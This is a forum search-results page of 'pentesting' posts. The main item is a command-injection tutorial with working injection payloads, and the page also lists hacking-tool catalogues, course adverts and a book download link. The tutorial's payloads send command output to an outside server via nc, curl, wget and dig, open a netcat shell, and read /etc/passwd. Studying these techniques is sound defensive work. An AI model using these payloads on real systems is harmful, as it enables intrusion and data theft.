Jump to content

Search the Community

Showing results for tags 'pentesting'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 14 results

  1. Venom psh-cmd-exe persistence payload Tutorial-By Spirit Hello guys I am Spirited wolf as you all know and today i'm here to demonstrate a tutorial on Persistence using Metasploit-Framework. So, for this we will use the Venom-The Shellcode Generator for this ================================ Tutorial Link:: Venom Tutorial link ================================== So, Venom is a toolkit designed by my friend and it's really very awesome toolkit You can download it from here:: https://sourceforge.net/projects/crisp-shellcode-generator/ (Point to remember :: The Version that i am using is currently in Developer Stage you can't download it) ====================================================== This Tutorial is for educational purpose only , I'll not be responsible for any Harm. ====================================================== Please Subscribe My Channel If you like it:: www.youtube.com/c/Pentestingwithspirit Please Like My Facebook Page:: www.facebook.com/Pentestingwithspirit Follow me on Twitter:: @spirit3113
  2. A complete guide to SQL Injection in which you will design your own lab and learn to attack it. Pentesting + Hacking + SQLI Page: SQL Injection Master Course Price: €337
  3. A command injection is a class of vulnerabilities where the attacker can control one or multiple commands that are being executed on a system. This post will go over the impact, how to test for it, defeating mitigations, and caveats. Before diving into command injections, let’s get something out of the way: a command injection is not the same as a remote code execution (RCE). The difference is that with an RCE, actual programming code is executed, whereas with a command injection, it’s an (OS) command being executed. In terms of possible impact, this is a minor difference, but the key difference is in how you find and exploit them. Setting up Let’s start by writing two simple Ruby scripts that you can run locally to learn finding and exploiting command injection vulnerabilities. I used Ruby 2.3.3p222. Below is ping.rb. puts `ping -c 4 #{ARGV[0]}` This script will ping the server that’s being passed to the script as argument. It will then return the command output on the screen. Example output below. $ ruby ping.rb '8.8.8.8' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=23.653 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=9.111 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=8.571 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=20.565 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.571/15.475/23.653/6.726 ms As you can see, it executed ping -c 4 8.8.8.8 and displayed the output on the screen. Here’s another script that will be used in the blog post: server-online.rb. puts `ping -c 4 #{ARGV[0]}`.include?('bytes from') ? 'yes' : 'no' This script will determine whether the server is online based on an ICMP response (ping). If it responds to the ping request, it’ll display yes on the screen. In case it doesn’t, it’ll display no. The output of the command isn’t returned to the user. Example output below. $ ruby server-on.rb '8.8.8.8' yes $ ruby server-on.rb '8.8.8.7' no Testing One of the best ways to detect a first-order command injection vulnerability is trying to execute a sleep command and determine if the execution time increases. To start with this, let’s establish a time baseline for the ping.rb script: $ time ruby ping.rb '8.8.8.8' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... 0.09s user 0.04s system 4% cpu 3.176 total Notice that executing script takes about 3 seconds. Now let’s determine if the script is vulnerable to a command injection by injecting a sleep command. $ time ruby ping.rb '8.8.8.8 && sleep 5' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... 0.10s user 0.04s system 1% cpu 8.182 total The script will now execute the command ping -c 4 8.8.8.8 && sleep 5. Notice the execution time again: it jumped from ~3 seconds to ~8 seconds, which is an increase of exactly 5 seconds. There can still be unexpected delays on the internet, so it’s important to repeat the injection and play with the amount of seconds to make sure it’s not a false positive. Let’s determine whether the server-online.rb script is vulnerable, too. $ time ruby server-online.rb '8.8.8.8' yes 0.10s user 0.04s system 4% cpu 3.174 total $ time ruby server-online.rb '8.8.8.8 && sleep 5' yes 0.10s user 0.04s system 1% cpu 8.203 total Again, the baseline shows executing a normal request takes about 3 seconds. Adding && sleep 5 to the command increases the time to 8 seconds. Depending on the command being executed, the sleep command may be injected differently. Here are a few payloads that you can try when looking for command injections (they all work): time ruby ping.rb '8.8.8.8`sleep 5`' When a command line gets parsed, everything between backticks is executed first. Executing echo `ls` will first execute ls and capture its output. It’ll then pass the output to echo, which displays the output of ls on the screen. This is called command substitution. Since execution of the command between backticks takes precedence, it doesn’t matter if the command executed afterwards fails. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8`sleep 5` sleep command executed, command substitution works in command line. ping -c 4 "8.8.8.8`sleep 5`" sleep command executed, command substitution works in complex strings (between double quotes). ping -c 4 $(echo 8.8.8.8`sleep 5`) sleep command executed, command substitution works in command substitution when using a different notation (see example below). ping -c 4 '8.8.8.8`sleep 5`' sleep command not executed, command substitution does not work in simple strings (between single quotes). ping -c 4 `echo 8.8.8.8`sleep 5`` sleep command not executed, command substitution does not work when using the same notation. time ruby ping.rb '8.8.8.8$(sleep 5)' This is a different notation for command substitution. This may be useful when backticks are filtered or encoded. When using command substitution to look for command injections, make sure to test both notations to avoid true-negatives in case the payload is already being substituted (see last example in table above). time ruby ping.rb '8.8.8.8; sleep 5' Commands are executed in a sequence (left to right) and they can be separated with semicolons. When a command in the sequence fails it won’t stop executing the other commands. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8;sleep 5 sleep command executed, sequencing commands works when used on the command line. ping -c 4 "8.8.8.8;sleep 5" sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 $(echo 8.8.8.8;sleep 5) sleep command executed, sequencing commands works in command substitution. ping -c 4 '8.8.8.8;sleep 5' sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 `echo 8.8.8.8;sleep 5` sleep command executed, sequencing commands works in command substitution. time ruby ping.rb '8.8.8.8 | sleep 5' Command output can be piped, in sequence, to another commands. When executing cat /etc/passwd | grep root, it’ll capture the output of the cat /etc/passwd command and pass it to grep root, which will then show the lines that match root. When the first command fail, it’ll still execute the second command. Below is a table of commands with injected payloads and its result. The injected payload is marked in green. Command Result ping -c 4 8.8.8.8 | sleep 5 sleep command executed, piping output works when used on the command line. ping -c 4 "8.8.8.8 | sleep 5" sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 $(echo 8.8.8.8 | sleep 5) sleep command executed, piping output works in command substitution. ping -c 4 '8.8.8.8 | sleep 5' sleep command not executed, the additional command is injected in a string, which is passed as argument to the ping command. ping -c 4 `echo 8.8.8.8 | sleep 5` sleep command executed, piping output works in command substitution. Exploiting To exploit the vulnerability for evidence is to determine whether it’s a generic or blind command injection. The difference between the two, is that a blind command injection doesn’t return the output of the command in the response. A generic command injection would return the output of the executes command(s) in the response. The sleep command is often a good proof of concept for either flavor. However, if you need more proof, execute id, hostname, or whoami and use the output as additional proof. The server’s hostname is useful to determine how many servers are affected and help the vendor to get a sense of impact faster. Important: needless to say, most companies don’t appreciate you snooping around on their systems. Before exploiting the vulnerability to pivot into something else, ask permission to the company. In nearly all situations proving that executing arbitrary but harmless commands like sleep, id, hostname or whoami is enough to proof impact to the affected company. Exploiting generic command injection This is usually pretty straightforward: the output of any injected command will be returned to the user: $ ruby ping.rb '8.8.8.8 && whoami' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.008 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=8.572 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=9.309 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=9.005 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.572/8.973/9.309/0.263 ms jobert The red part shows the output of the ping command. The green text the output of the whoami command. From this point, you can gather evidence for your proof of concept. Again, stick to harmless commands. Exploiting blind command injection With blind command injections the output isn’t returned to the user, so we should find other ways to extract the output. The most straightforward technique is to offload the output to your server. To simulate this, run nc -l -n -vv -p 80 -k on your server and allow inbound connections on port 80 in your firewall. Once you’ve set up the listener, use nc, curl, wget, telnet, or any other tool that sends data to the internet, to send the output to your server: $ ruby server-online.rb '8.8.8.8 && hostname | nc IP 80' yes Then observe a connection being made to your server that shows the output of the hostname command: $ nc -l -n -vv -p 80 -k Listening on [0.0.0.0] (family 0, port 81) Connection from [1.2.3.4] port 80 [tcp/*] accepted (family 2, sport 64225) hacker.local In the example above, nc is used to send the output of the command to your server. However, nc might be deleted or unable to execute. To avoid going down a rabbit hole, there are a few simple payloads to determine if a command exists. In case any of the commands increase the time with 5 seconds, you know the command exists. curl -h && sleep 5 wget -h && sleep 5 ssh -V && sleep 5 telnet && sleep 5 When you’ve determined a command exists, you can use any of those commands to send the output of a command to your server, like this: whoami | curl http://your-server -d @- wget http://your-server/$(whoami) export C=whoami | ssh user@your-server (setup the user account on your-server to authenticate without a password and log every command being executed) Even though the server-online.rb script doesn’t output the result of the hostname command, the output can be sent to a remote server and obtained by an attacker. In some cases, outbound TCP and UDP connections are blocked. It’s still possible to extract the output in that case, we just have to do a little bit more work. In order to extract the output, we have to guess the output based on something that we can change. In this case, the execution time can be increased using the sleep command. This can be used to extract the output. The trick here is to pass the result of a command to the sleep command. Here’s an example: sleep $(hostname | cut -c 1 | tr a 5). Let’s analyze this for a moment. It’s executing the hostname command. Let’s assume it returns hacker.local. It’ll take that output and pass it to cut -c 1. This will take the first character of hacker.local, which is the character h. It passes it to tr a 5, which will replace the character a with a 5 in the output of the cut command (h). The output of the tr command is then passed to the sleep command, resulting in sleep h being executed. This will immediately error, since sleep can only take a number as first argument. The goal is then to iterate over the characters with the tr command. Once you execute sleep $(hostname | cut -c 1 | tr h 5), the command will take 5 seconds longer to execute. This is how you determine that the first character is an h. Once you guessed a character, increase the number you pass to the cut -c command, and repeat. Here’s a table with the commands to determine the output: Command Time Result ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr a 5)' 3s - ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 1 | tr h 5)' 8s h ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 2 | tr a 5)' 8s a ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr a 5)' 3s - ruby server-online.rb '8.8.8.8;sleep $(hostname | cut -c 3 | tr c 5)' 8s c To determine how many characters you need to guess: pipe the output of hostname to wc -c and pass that to the sleep command. hacker.local is 12 characters. The hostname command returns the hostname and a new line, so wc -c will return 13. We established that normally, the script takes 3 seconds to complete. $ time ruby server-online.rb '8.8.8.8 && sleep $(hostname | wc -c)' yes 0.10s user 0.04s system 0% cpu 16.188 total The payload above shows that the script now takes 16 seconds to complete, which means the output of hostname is 12 characters: 16 - 3 (baseline) - 1 (new line) = 12 characters. When executing this payload on a web server, know that the output may change: the length of the hostname could change when requests are handled by different servers. The technique above works fine for smaller outputs, but can take a long time for reading a file. Some of the following methods can be pretty intrusive, so always make sure the company gave you a thumbs up to use more invasive extraction methods. In case outbound connections are blocked and the output is too long to read, here are a few other tricks to try (useful during CTFs): Run a port scan on the server and based on the exposed services, determine a way to extract the output. FTP: try writing the file to a directory you can download files from. SSH: try writing the output of the command to the MOTD banner, then simply SSH to the server. Web: try writing the output of the command to a file in a public directory (/var/www/). Spawn a shell on a port that can be reached from the outside (only available in custom netcat build): nc -l -n -vv -p 80 -e /bin/bash (unix) or nc -l -n -vv -p 80 -e cmd.exe (windows). Do a DNS query with dig or nslookup to send the output to port 53 (UDP): dig `hostname` @your-server or nslookup `hostname` your-server. Output can be captured with nc -l -n -vv -p 53 -u -k on your server. This may work because outbound DNS traffic is often allowed. Check out this tweet how to offload file contents with dig. Change the ICMP packet size when pinging your server to offload data. tcpdump can be used to capture the data. Check out this tweet how to do this. There’s plenty of other ways, but it often depends on what kind of options the servers gives you. The technique shown above are most common when exploiting command injection vulnerabilities. The key is to use what you have to extract the output! Defeating mitigations Sometimes mitigations have been put in place, which may cause the above techniques not to work. One of the mitigations that I’ve seen over the years, is a restriction on whitespace in the payload. Luckily, there’s something called Brace Expansion that can be used to create payloads without whitespace. Below is ping-2.rb, which is the second version of ping.rb. Before passing the user input to the command, it removes whitespace from the input. puts `ping -c 4 #{ARGV[0].gsub(/\s+?/,'')}` When passing 8.8.8.8 && sleep 5 as argument, it’d execute ping -c 4 8.8.8.8&&sleep5, which will result in an error showing that the command sleep5 isn’t found. There’s an easy workaround by using brace expansion: $ time ruby ping-2.rb '8.8.8.8;{sleep,5}' ... 0.10s user 0.04s system 1% cpu 8.182 total Here’s a payload that sends the output of a command to an external server without using whitespace: $ ruby ping.rb '8.8.8.8;hostname|{nc,192.241.233.143,81}' PING 8.8.8.8 (8.8.8.8): 56 data bytes ... Or to read /etc/passwd: $ ruby ping.rb '8.8.8.8;{cat,/etc/passwd}' PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=46 time=9.215 ms 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=10.194 ms 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=10.171 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=8.615 ms --- 8.8.8.8 ping statistics --- 4 packets transmitted, 4 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 8.615/9.549/10.194/0.668 ms ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. ... Whenever a command is being executed with user input mitigations have to be put in place by the developer. Developers take different routes to implement mitigations, so it’s up to you to discover what they did and how to work around them. Happy hacking! Jobert. Source :
  4. Hi all, while surfing various IRC Channels, i have come across a list of very useful links, courses to get into hacking URL: https://ghostbin.com/paste/j858d There are courses for computer basics, hacking, programming and many more Good luck in your long journey of learning!
  5. Hi, Another great resource for pentesting and programming is edX. They have some free and paid courses. Worth taking a look, Software Development Fundamentals: https://www.edx.org/course/software-development-fundamentals-pennx-sd1x Intro to Computing using Python: https://www.edx.org/course/introduction-computing-using-python-gtx-cs1301x Data Science Orientation: https://www.edx.org/course/data-science-orientation-microsoft-dat101x-2 How VR Works: https://www.edx.org/course/how-virtual-reality-vr-works-uc-san-diegox-cse165x Comp Sci Essentials for software development: https://www.edx.org/professional-certificate/computer-science-essentials-software Java and Android foundation: https://www.edx.org/professional-certificate/java-android-foundation Software Development: https://www.edx.org/micromasters/software-development Machine Learning: https://www.edx.org/course/machine-learning-columbiax-csmm-102x-0 Artificial Intelligence: https://www.edx.org/course/artificial-intelligence-ai-columbiax-csmm-101x-0 How to Code: simple data: https://www.edx.org/course/how-code-simple-data-ubcx-htc1x Professional Android App Development: https://www.edx.org/course/professional-android-app-development-galileox-caad003x There are many more courses to be explored, these are just some courses I find interest in. Good Luck.
  6. Hi all, there is a website that I found where you can practice your website hacking skills. There are 50 vulnerabilities to be found, this website goes along with the courses from my previous course where I provide a URL with a plethora of courses The URL of this website: http://hackyourselffirst.troyhunt.com/ Good luck.
  7. NoBody.

    nobody.

    Hi, im nobody and im from Rusia, sorry for bad english i use google translate in most of case's.. My skills: pentesting and web-design(full template)
  8. Salut all , ma numesc iulian sunt foarte pasionat de acest domeniu dar in special de pentesting , am intrat in aceasta comunitate sa invat multe lucruri noi si cred ca am nimerit bine. Sper ca intr-o zi Romania sa ajung sus in acest domeniu si sa se vorbeasca de noi numa de bine. Nu sunt chiar incepator dar nici departe nu sunt , asa ca daca sunteti binevoitori sa imi dati si mie niste tutoriale mai avansate in pentesting mas bucura foarte mult. Mersi anticipat. Si nu uitati Respecta si vei fi respectat.
  9. Bugtroid este un instrument inovativ dezvoltat de echipa de BugTraq-Team. Principalele caracteristici ale acestei aplicatie este c? are mai mult de 200 de instrumente pentru Android si Linux (PRO) pentru pentesting. Are un meniu clasificate în func?ie de natura instrumentului poti g?si: 1 Anonymity : Proxy Browser Clean Master QuickLab cleaner Orbot Fakegps ChangeMac Orweb Proxydroid IP Checker Proxy server Direccion IP Spy Kit-Universal Mailer 2. 802.11(WIFI) Claves wifi Wifi Analyzer WifiLeaks Mac2wepkey WifiKill Wifi Radar Airmon 3. BruteForce Router Brute Force Routerpwn WIBR 4. DDOS AnDOsid Droidswarm Loic 1 Loic 2 SMS Bomber SMS reliator OFS Doser 5. Crypto HashDroid HashDecrypt Cryptonite APG CrypticSMS HashPass 6. Forensics Loggy Wifi Credetials Recovery Undelete CellID Info aLogcat Exit Viewer 7. Networking Wirless teher Netowrk port database aNmap Foxfi Fing AndFTP AndSMB Wake on Lan ConnectBot SSHtunel Connect SQL 8. Pentesting Bulbsecurity framework Nessus Zanti Dsploit Wifiinspect 9. People Search 123people Gmon2 Wigle Wifi Wardriving People Search Search People KGB People 9.Remote Flu Client DynDNS Blue Remote No-Ip Airdroid TeamViewer Android VNC 10. Scripting Scripting for android Perl for android Python for android Llama Script Launcher 11. Security Stripg Guard Keepass Droidwall Wifi Protector BLacklist apk Security Key Generator RedPhone DroidSheep Guard 12. Sniffers SSLStrip Droid Sniff Droidsheep Dsploit Shark Shark Reader Facesniff ArpSpoof Intercepter-NG 13. System Root Browser Autorun Cpuoverlay Zarchiver Osmonitor ROM toolbox Lite androPHP 14. Web Admin Panel Finder. 15. Av's VirusTotal Zoner Antivirus Antivirus Dr Web Avast Avira Download : DepositFiles
  10. Incep cursul de OSCP pe Feb 7 si sunt curios daca mai sunt aici si alti membrii care au inceput cursul sau l-au terminat si obtinut certificatul. Am ales optiunea pentru 60 de zile ca nu m-am "jucat" cu pentesting de ceva vreme si am mai ruginit. Am avut abtineri mari de la cursuri de pentesting pentru ca ii o alta ramura in IT, si am ales sa lucrez cu retele, servere, sisteme virtuale si desktopuri in schimb. Astept raspuns!
  11. Brief contents Chapter 1: Setting Up Your Python Environment Chapter 2: The Network: Basics Chapter 3: The Network: Raw Sockets and Sniffing Chapter 4: Owning the Network with Scapy Chapter 5: Web Hackery Chapter 6: Extending Burp Proxy Chapter 7: GitHub Command and Control Chapter 8: Common Trojaning Tasks on Windows Chapter 9: Fun with Internet Explorer Chapter 10: Windows Privilege Escalation Chapter 11: Automating Offensive Forensics Index www.mediafire.com/download/r3g1pef6ccsbplc/Black.pdf
  12. Salut tuturor. De curand am vorbit cu Nytro despre cel mai mare si mai complex proiect marca RST. Este vorba despre un OS pt pentesting. Stiu ca exista kali,backtrack dar ar fi frumos..greu dar frumos. Implementam tool-uri clasice dar si originale rst. Ar fi ceva extraordinar + ca il personalizam asa cum dorim si implica toate cunostintele noastre. Avem nevoie de programatori..oameni pt grafica,colectare si implementare tool-uri etc. Nu am nevoie de comentarii ironice, ne trebuie cam 8-9 membrii. Vrea cineva sa se implice??
  13. We’re always on the lookout for and interesting ARM hardware for Kali Linux. Whether it’s a Galaxy Note or a USB stick sized SS808, we want to see Kali run on it. You can therefore imagine our excitement, when we first laid our eyes on the Utilite pro. Utilite Pro is a quad core ARM cortex-A9 machine with up to 4 GB of RAM, up to 512 GB mSATA SSD, HDMI and DVI-D output, dual (2x) 1GB nics, a built in wireless card and 4 USB ports. And its fanless. With those type of specs, this little beauty was unlikely to skip our radars. We wanted Kali Linux on that baby, real bad. We took this opportunity to create and publish the Offensive Security Kali Linux contributed ARM images, and thought we’d demonstrate the use of these scripts, and show you how to get Kali linux on the Utilite Pro. From there, the options are endless. The Utilite Pro came with Ubuntu preinstalled. The first thing we wanted to do, is update the machines uBoot bootloader image, to allow for support of 1.8V microSD cards. root@utilite:~# apt-get install mtd-utils root@utilite:~# git clone https://github.com/offensive-security/kali-uboot-images.git uboot root@utilite:~/uboot# ./cm-fx6-bootloader-update.sh CompuLab CM-FX6 (Utilite) boot loader update utility 1.1 (Nov 25 2013) >> Checking for utilities... >> ...Done >> Board CPU: mx6q >> Board DRAM: 2gb >> Looking for boot loader image file: cm-fx6-u-boot-mx6q-2gb >> ...Found >> Looking for SPI flash: mtd0 >> ...Found >> Current U-Boot version in SPI flash: U-Boot 2009.08-cm-fx6-0.87+tools (Oct 06 2013 - 13:46:27) >> New U-Boot version in file: (248K) >> Proceed with the update? 1) Yes 2) No #? Yes ** Do not power off or reset your computer!!! >> Erasing SPI flash... Erasing 4 Kibyte @ bf000 -- 100 % complete >> ...Done >> Writing boot loader to the SPI flash... ........... >> ...Done >> Checking boot loader in the SPI flash... . >> ...Done >> Boot loader update succeeded! root@utilite:~/uboot# Once that was done, we whipped out our Offensive Security Trusted Contributed ARM image scripts, and let our Utilite image builder script loose. On a separate 32 bit Kali Linux machine, we set up all the pre-requisites to build our ARM image, and make sure we have at least 10GB of free space. We start with downloading and setting up the ARM cross compiler and the build scripts: root@builder:~# git clone https://github.com/offensive-security/kali-arm-build-scripts.git Cloning into 'kali-arm-build-scripts'... remote: Counting objects: 95, done. remote: Compressing objects: 100% (57/57), done. remote: Total 95 (delta 62), reused 70 (delta 37) Unpacking objects: 100% (95/95), done. root@builder:~# git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7.git Cloning into 'gcc-arm-linux-gnueabihf-4.7'... remote: Counting objects: 5839, done. remote: Compressing objects: 100% (3105/3105), done. remote: Total 5839 (delta 2559), reused 5837 (delta 2559) Receiving objects: 100% (5839/5839), 74.64 MiB | 3.38 MiB/s, done. Resolving deltas: 100% (2559/2559), done. root@builder:~# Once that’s done, we next run the build-deps scripts, which will install all the dependencies required for the build: root@builder:~# cd kali-arm-build-scripts/ root@builder:~/kali-arm-build-scripts# ./build-deps.sh Reading package lists... Done Building dependency tree Reading state information... Done abootimg is already the newest version. ... Now with everything in place, we kick off our Utilite image builder script, and go for a coffee, or six. The script requires a version parameter for the image, which is something we use to tag our ARM image versions. Once ready, you should get a *full* Kali Linux image which can then be dd’ed to a microSD card. Of course, you are encouraged to read the build script, and edit any installation parameters or packages to your needs. root@builder:~/kali-arm-build-scripts# ./utilite.sh 1.0 I: Retrieving Release I: Retrieving Release.gpg I: Checking Release signature I: Valid Release signature (key id 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6) I: Retrieving Packages I: Validating Packages I: Resolving dependencies of required packages... I: Resolving dependencies of base packages... ... ... ... Cloning into 'firmware'... remote: Counting objects: 874, done. remote: Compressing objects: 100% (685/685), done. remote: Total 874 (delta 181), reused 849 (delta 167) Receiving objects: 100% (874/874), 30.17 MiB | 4.84 MiB/s, done. Resolving deltas: 100% (181/181), done. del devmap : loop0p2 del devmap : loop0p1 Removing temporary build files Generating sha1sum for kali-1.0-utilite.img Compressing kali-1.0-utilite.img Generating sha1sum for kali-1.0-utilite.img.xz root@builder:~/kali-arm-build-scripts# Once the image is ready, you can find it in the utlite subdirectory created by the script: root@builder:~/kali-arm-build-scripts# ls -l utilite-1.0/ total 334720 -rw-r--r-- 1 root root 63 Dec 7 23:48 kali-1.0-utilite.img.sha1sum -rw-r--r-- 1 root root 342742176 Dec 7 23:52 kali-1.0-utilite.img.xz -rw-r--r-- 1 root root 66 Dec 7 23:53 kali-1.0-utilite.img.xz.sha1sum root@builder:~/kali-arm-build-scripts# Extract the compressed image file, and dd it to the microSD card (in our case, sdb). Once done, pop the microSD card into the Utilite, and boot it up! root@proxy:~/kali-arm-build-scripts# cd utilite-1.0/ root@proxy:~/kali-arm-build-scripts/utilite-1.0# 7z x kali-1.0-utilite.img.xz 7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18 p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs) Processing archive: kali-1.0-utilite.img.xz Extracting kali-1.0-utilite.img Everything is Ok Size: 7340032000 Compressed: 342742176 root@proxy:~/kali-arm-build-scripts/utilite-1.0# dd if=kali-1.0-utilite.img of=/dev/sdb bs=1M Once booted, you can log into the Utlite image with root / toor credentials. root@kali:~# uname -a Linux kali 3.0.35-cm-fx6-4 #1 SMP Sat Dec 7 23:47:48 EST 2013 armv7l GNU/Linux root@kali:~# cat /proc/cpuinfo Processor : ARMv7 Processor rev 10 (v7l) processor : 0 BogoMIPS : 790.52 processor : 1 BogoMIPS : 790.52 processor : 2 BogoMIPS : 790.52 processor : 3 BogoMIPS : 790.52 Features : swp half thumb fastmult vfp edsp neon vfpv3 CPU implementer : 0x41 CPU architecture: 7 CPU variant : 0x2 CPU part : 0xc09 CPU revision : 10 Hardware : Compulab CM-FX6 Revision : 63012 Serial : 0b0991d4d81917c9 root@kali:~# cat /proc/meminfo MemTotal: 2006440 kB MemFree: 1922864 kB .... More info & buy: Home | Utilite Source: Kali Linux Documentation
  14. alien

    A-Z Hacking Wiki

    Big tutorial database covering most important Pentesting topics, from Armitage to SQL injection. Penetration Testing Tips & Tricks - PaulDotCom Security Weekly
×
×
  • Create New...